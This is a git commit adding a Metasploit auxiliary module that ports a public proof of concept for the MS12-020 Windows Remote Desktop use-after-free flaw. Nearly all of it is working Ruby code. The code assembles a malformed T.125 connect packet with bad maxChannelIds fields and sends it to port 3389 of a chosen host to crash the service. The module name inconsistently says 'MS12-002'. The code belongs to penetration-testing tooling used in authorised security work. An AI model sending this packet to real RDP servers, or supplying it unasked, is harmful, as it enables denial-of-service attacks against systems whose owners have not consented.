Ported Daniel/Alex/jduck's MS12-020 PoC as a Metasploit module

2012-03-19 12:53:34 -05:00 · 2012-03-19 12:53:34 -05:00 · d8be328b89
parent e938f24267
commit d8be328b89
1 changed files with 137 additions and 0 deletions
--- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
+++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
@ -0,0 +1,137 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'MS12-002 Microsoft Remote Desktop Use-After-Free Vulnerability',
+			'Description'    => %q{
+				This module exploits the MS12-002 RDP vulnerability originally discovered and
+				reported by Luigi Auriemma.  The flaw can be found in the way the T.125
+				ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result
+				an invalid pointer being used, therefore causing a denail-of-service condition.
+				Code execution may seem possible, but at this point it's not yet proven.
+			},
+			'References'     =>
+				[
+					[ 'CVE', '2012-0002' ],
+					[ 'MSB', 'MS12-020' ],
+					[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
+					[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
+					[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
+					[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/18606/' ]
+				],
+			'Author'         =>
+				[
+					'Luigi Auriemma',
+					'Daniel Godas-Lopez',  # Entirely based on Daniel's pastie
+					'Alex Ionescu',
+					'jduck',
+					'#ms12-020'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "Feb 25 2012"
+		))
+
+		register_options(
+			[
+				Opt::RPORT(3389)
+			], self.class)
+	end
+
+	def run
+		max_channel_ids = "\x02\x01\xff"
+
+		pkt = ''+
+			"\x03\x00\x00\x13" +  # TPKT: version + length
+			"\x0E\xE0\x00\x00" +  # X.224 (connection request)
+			"\x00\x00\x00\x01" +
+			"\x00\x08\x00\x00" +
+			"\x00\x00\x00"     +
+			"\x03\x00\x00\x6A" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224 (connect-initial)
+			"\x7F\x65\x82\x00" +  # T.125
+			"\x5E"             +
+			"\x04\x01\x01"     +  # callingDomainSelector
+			"\x04\x01\x01"     +  # calledDomainSelector
+			"\x01\x01\xFF"     +  # upwardFlag
+			"\x30\x19"         +  # targetParameters
+			max_channel_ids    +  # maxChannelIds
+			"\x02\x01\xFF"     +  # maxUserIds
+			"\x02\x01\x00"     +  # maxTokenIds
+			"\x02\x01\x01"     +  # numPriorities
+			"\x02\x01\x00"     +  # minThroughput
+			"\x02\x01\x01"     +  # maxHeight
+			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
+			"\x02\x01\x02"     +  # protocolVersion
+			"\x30\x19"         +  # minimumParameters
+			max_channel_ids    +  # maxChannelIds
+			"\x02\x01\xFF"     +  # maxUserIds
+			"\x02\x01\x00"     +  # maxTokenIds
+			"\x02\x01\x01"     +  # numPriorities
+			"\x02\x01\x00"     +  # minThroughput
+			"\x02\x01\x01"     +  # maxHeight
+			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
+			"\x02\x01\x02"     +  # protocolVersion
+			"\x30\x19"         +  # maximumParameters
+			max_channel_ids    +  # maxChannelIds
+			"\x02\x01\xFF"     +  # maxUserIds
+			"\x02\x01\x00"     +  # maxTokenIds
+			"\x02\x01\x01"     +  # numPriorities
+			"\x02\x01\x00"     +  # minThroughput
+			"\x02\x01\x01"     +  # maxHeight
+			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
+			"\x02\x01\x02"     +  # protocolVersion
+			"\x04\x82\x00\x00" +  # userData
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x08" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x28"             +  # T.125
+			"\x03\x00\x00\x0C" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x38\x00\x06\x03" +  # T.125
+			"\xF0"             +
+			"\x03\x00\x00\x09" +  # TPKT: version + length
+			"\x02\xF0\x80"     +  # X.224
+			"\x21\x80"            # T.125
+
+		connect
+		print_status("#{rhost}:#{rport} - Sending #{self.name}")
+		sock.put(pkt)
+		select(nil, nil, nil, 3)
+		disconnect
+		print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")
+	end
+
+end